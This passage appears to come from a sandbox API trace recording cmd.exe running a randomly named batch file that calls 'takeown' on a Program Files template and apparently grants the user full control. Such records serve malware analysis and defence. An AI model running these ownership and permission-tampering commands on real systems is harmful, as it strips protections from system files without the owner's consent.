_String2="ALLUSER", _MaxCount=0x7) returned 2 [0273.413] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0273.413] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0273.414] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0273.414] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0273.414] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x5eeda8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5eedf4 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", lpProcessInformation=0x5eedf4*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x84, dwThreadId=0x418)) returned 1 [0273.420] CloseHandle (hObject=0xb8) returned 1 [0273.420] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0273.420] GetEnvironmentStringsW () returned 0x76b300* [0273.421] FreeEnvironmentStringsA (penv="=") returned 1 [0273.421] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0277.931] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0x5eed8c | out: lpExitCode=0x5eed8c*=0x0) returned 1 [0277.931] CloseHandle (hObject=0xb0) returned 1 [0277.931] _vsnwprintf (in: _Buffer=0x5eee74, _BufferCount=0x13, _Format="%08X", _ArgList=0x5eed94 | out: _Buffer="00000000") returned 8 [0277.931] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0277.931] GetEnvironmentStringsW () returned 0x76b300* [0277.931] FreeEnvironmentStringsA (penv="=") returned 1 [0277.931] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0277.931] GetEnvironmentStringsW () returned 0x76b300* [0277.931] FreeEnvironmentStringsA (penv="=") returned 1 [0277.931] DeleteProcThreadAttributeList (in: lpAttributeList=0x5eee20 | out: lpAttributeList=0x5eee20) [0277.932] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.932] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0278.677] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.677] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0278.677] _get_osfhandle (_FileHandle=0) returned 0x38 [0278.677] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0278.677] SetConsoleInputExeNameW () returned 0x1 [0278.677] GetConsoleOutputCP () returned 0x1b5 [0278.677] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0278.677] SetThreadUILanguage (LangId=0x0) returned 0x409 [0278.678] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x5ef5b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0278.678] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0278.678] _get_osfhandle (_FileHandle=3) returned 0xb0 [0278.678] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0278.679] _get_osfhandle (_FileHandle=3) returned 0xb0 [0278.679] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0278.679] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x5ef584, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x5ef584*=0xb3, lpOverlapped=0x0) returned 1 [0278.679] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0278.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0278.679] _get_osfhandle (_FileHandle=3) returned 0xb0 [0278.679] GetFileType (hFile=0xb0) returned 0x1 [0278.679] _get_osfhandle (_FileHandle=3) returned 0xb0 [0278.679] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0278.679] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", nBufferLength=0x208, lpBuffer=0x5eed00, lpFilePart=0x5eecc4 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", lpFilePart=0x5eecc4*="Seyes.jtp") returned 0x34 [0278.679] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x5eea08 | out: lpFindFileData=0x5eea08) returned 0x7609d8 [0278.679] FindClose (in: hFindFile=0x7609d8 | out: hFindFile=0x7609d8) returned 1 [0278.679] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0278.679] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x5eea08 | out: lpFindFileData=0x5eea08) returned 0x7609d8 [0278.680] FindClose (in: hFindFile=0x7609d8 | out: hFindFile=0x7609d8) returned 1 [0278.680] _wcsnicmp (_String1="WIA843~1", _String2="Windows Journal", _MaxCount=0xf) returned -13 [0278.680] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates", lpFindFileData=0x5eea08 | out: lpFindFileData=0x5eea08) returned 0x7609d8 [0278.680] FindClose (in: hFindFile=0x7609d8 | out: hFindFile=0x7609d8) returned 1 [0278.680] _wcsnicmp (_String1="TEMPLA~1", _String2="Templates", _MaxCount=0x9) returned 10 [0278.680] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", lpFindFileData=0x5eea08 | out: lpFindFileData=0x5eea08) returned 0x7609d8 [0278.680] FindClose (in: hFindFile=0x7609d8 | out: hFindFile=0x7609d8) returned 1 [0278.680] _wcsicmp (_String1="set", _String2=")") returned 74 [0278.680] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0278.680] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0278.680] _wcsicmp (_String1="IF", _String2="set") returned -10 [0278.680] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0278.680] _wcsicmp (_String1="REM", _String2="set") returned -1 [0278.680] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0278.681] _tell (_FileHandle=3) returned 63 [0278.681] _close (_FileHandle=3) returned 0 [0278.681] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef348 | out: _Buffer="\r\n") returned 2 [0278.681] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.681] GetFileType (hFile=0x3c) returned 0x2 [0278.681] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0278.681] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef320 | out: lpMode=0x5ef320) returned 1 [0278.817] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.817] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef338, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef338*=0x2) returned 1 [0278.897] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0278.897] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0278.897] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x5ef344 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0278.897] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x5ef344 | out: _Buffer=">") returned 1 [0278.897] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.897] GetFileType (hFile=0x3c) returned 0x2 [0278.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0278.897] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef324 | out: lpMode=0x5ef324) returned 1 [0280.337] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.337] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5ef33c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x5ef33c*=0x1e) returned 1 [0280.574] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.574] GetFileType (hFile=0x3c) returned 0x2 [0280.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.575] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5c4 | out: lpMode=0x5ef5c4) returned 1 [0280.648] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.648] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7781d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x5ef5dc, lpReserved=0x0 | out: lpBuffer=0x7781d0*, lpNumberOfCharsWritten=0x5ef5dc*=0x3) returned 1 [0280.676] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x5ef5e4 | out: _Buffer=" FN=\"Seyes.jtp\" ") returned 16 [0280.676] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.676] GetFileType (hFile=0x3c) returned 0x2 [0280.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.676] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0280.686] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.686] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x10) returned 1 [0280.693] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef5f8 | out: _Buffer="\r\n") returned 2 [0280.693] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.693] GetFileType (hFile=0x3c) returned 0x2 [0280.693] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.693] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5d0 | out: lpMode=0x5ef5d0) returned 1 [0280.738] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.738] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef5e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5e8*=0x2) returned 1 [0280.779] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0280.779] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0280.779] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0280.779] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0280.779] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0280.779] _wcsicmp (_String1="set", _String2="CD") returned 16 [0280.779] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0280.779] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0280.779] _wcsicmp (_String1="set", _String2="REN") returned 1 [0280.779] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0280.779] _wcsicmp (_String1="set", _String2="SET") returned 0 [0280.779] GetConsoleTitleW (in: lpConsoleTitle=0x5ef168, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.887] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0280.887] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0280.887] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0280.887] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0280.887] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0280.887] _wcsicmp (_String1="set", _String2="CD") returned 16 [0280.887] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0280.887] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0280.887] _wcsicmp (_String1="set", _String2="REN") returned 1 [0280.887] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0280.887] _wcsicmp (_String1="set", _String2="SET") returned 0 [0280.887] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0280.887] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0280.887] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0280.887] SetEnvironmentVariableW (lpName="FN", lpValue="\"Seyes.jtp\"") returned 1 [0280.887] GetEnvironmentStringsW () returned 0x76b300* [0280.887] FreeEnvironmentStringsA (penv="=") returned 1 [0280.887] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.888] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0280.900] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.900] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0280.999] _get_osfhandle (_FileHandle=0) returned 0x38 [0280.999] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0282.227] SetConsoleInputExeNameW () returned 0x1 [0282.227] GetConsoleOutputCP () returned 0x1b5 [0282.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0282.505] SetThreadUILanguage (LangId=0x0) returned 0x409 [0282.787] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x5ef5b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0282.788] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0282.788] _get_osfhandle (_FileHandle=3) returned 0xb0 [0282.788] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0282.788] _get_osfhandle (_FileHandle=3) returned 0xb0 [0282.788] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0282.788] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x5ef584, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x5ef584*=0xa3, lpOverlapped=0x0) returned 1 [0282.788] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0282.788] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0282.788] _get_osfhandle (_FileHandle=3) returned 0xb0 [0282.788] GetFileType (hFile=0xb0) returned 0x1 [0282.788] _get_osfhandle (_FileHandle=3) returned 0xb0 [0282.788] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0282.789] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0x5eed00, lpFilePart=0x5eecc4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x5eecc4*="vRnqNMBW.bat") returned 0x2a [0282.789] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x5eea08 | out: lpFindFileData=0x5eea08) returned 0x7609d8 [0282.789] FindClose (in: hFindFile=0x7609d8 | out: hFindFile=0x7609d8) returned 1 [0282.789] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x5eea08 | out: lpFindFileData=0x5eea08) returned 0x7609d8 [0282.789] FindClose (in: hFindFile=0x7609d8 | out: hFindFile=0x7609d8) returned 1 [0282.789] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0282.789] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x5eea08 | out: lpFindFileData=0x5eea08) returned 0x7609d8 [0282.789] FindClose (in: hFindFile=0x7609d8 | out: hFindFile=0x7609d8) returned 1 [0282.789] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0x5eea08 | out: lpFindFileData=0x5eea08) returned 0x7609d8 [0282.789] FindClose (in: hFindFile=0x7609d8 | out: hFindFile=0x7609d8) returned 1 [0282.789] _wcsicmp (_String1="cd", _String2=")") returned 58 [0282.789] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0282.789] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0282.789] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0282.789] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0282.789] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0282.789] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0282.790] _tell (_FileHandle=3) returned 78 [0282.790] _close (_FileHandle=3) returned 0 [0282.790] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef348 | out: _Buffer="\r\n") returned 2 [0282.790] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.790] GetFileType (hFile=0x3c) returned 0x2 [0282.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0282.790] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef320 | out: lpMode=0x5ef320) returned 1 [0283.074] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.074] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef338, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef338*=0x2) returned 1 [0283.153] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0283.153] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0283.153] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x5ef344 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0283.153] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x5ef344 | out: _Buffer=">") returned 1 [0283.153] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.153] GetFileType (hFile=0x3c) returned 0x2 [0283.153] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.153] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef324 | out: lpMode=0x5ef324) returned 1 [0283.208] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.208] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5ef33c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x5ef33c*=0x1e) returned 1 [0283.281] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.281] GetFileType (hFile=0x3c) returned 0x2 [0283.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.281] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5c4 | out: lpMode=0x5ef5c4) returned 1 [0283.455] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.455] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x778368*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef5dc, lpReserved=0x0 | out: lpBuffer=0x778368*, lpNumberOfCharsWritten=0x5ef5dc*=0x2) returned 1 [0283.765] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x5ef5e4 | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0283.765] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.765] GetFileType (hFile=0x3c) returned 0x2 [0283.765] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0283.765] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0283.966] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.966] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x25) returned 1 [0284.252] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef5f8 | out: _Buffer="\r\n") returned 2 [0284.252] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.252] GetFileType (hFile=0x3c) returned 0x2 [0284.252] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.252] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5d0 | out: lpMode=0x5ef5d0) returned 1 [0284.284] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.284] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef5e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5e8*=0x2) returned 1 [0284.326] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0284.326] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0284.326] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0284.326] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0284.326] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0284.326] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0284.326] GetConsoleTitleW (in: lpConsoleTitle=0x5ef168, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0284.768] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0284.768] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0284.768] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0284.768] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0284.768] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0284.768] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0284.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0284.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0284.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x5eef20, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x5eef18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x5eef18*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0284.769] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0284.769] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5eecc4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.769] GetFullPathNameW (in: 